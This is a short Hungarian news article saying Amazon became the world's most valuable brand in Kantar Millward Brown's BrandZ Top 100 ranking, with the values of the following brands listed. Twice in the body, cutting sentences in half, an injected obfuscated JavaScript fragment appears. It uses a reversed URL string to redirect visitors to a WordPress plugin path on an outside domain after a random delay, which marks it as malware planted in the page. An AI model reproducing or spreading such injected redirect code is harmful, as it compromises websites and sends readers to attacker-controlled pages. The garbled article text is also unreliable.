Kezdőlap Gazdaság Az Amazon a világ legértékesebb márkája

Az Amazon a világ legértékesebb márkája

A Kantar Millward Brown médiapiaci kutatóvállalat “Brandz Top 100” felmérése szerint az Amazon értéke 302,1 milliárd dollárról 315,5 milliárd dollárra nőtt.A második legértékesebb márka toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továbbra is az Apple, 309,5 milliárd dollárral.A tavalyi első helyezett Google idén a harmadik helyre csúszott vissza, 309 milliárd dolláros márkaértékkel.A lista toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további hét helyezettje a Microsoft (251,24 milliárd dollár), a Visa (177,91 milliárd dollár), a Facebook (158,96 milliárd dollár), az Alibaba (131,2 milliárd dollár), a Tencent (130,86 milliárd dollár), McDonald’s (130,36 milliárd dollár) és az AT&T (108,37 milliárd dollár).A százas listán 15 kínai cég szerepel.A listán szereplő száz márkának az összesített értéke 7 százalékkal 4700…

- Hirdetés -
MEGOSZTÁS
- Hirdetés -